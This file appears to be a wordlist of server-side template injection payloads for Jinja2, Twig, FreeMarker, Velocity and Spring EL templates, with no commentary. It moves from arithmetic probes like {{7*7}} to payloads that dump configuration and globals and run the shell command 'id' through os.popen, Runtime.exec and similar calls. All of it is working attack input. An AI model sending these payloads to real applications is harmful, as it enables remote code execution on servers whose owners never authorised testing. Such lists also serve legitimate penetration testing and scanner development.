{{7*7}}
{{7*'7'}}
${7*7}
#{7*7}
<%= 7*7 %>
{{config}}
{{self.__init__.__globals__}}
{{''.__class__.__mro__[2].__subclasses__()}}
${T(java.lang.Runtime).getRuntime().exec('id')}
${"freemarker.template.utility.Execute"?new()("id")}
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{% import os %}{{os.popen("id").read()}}
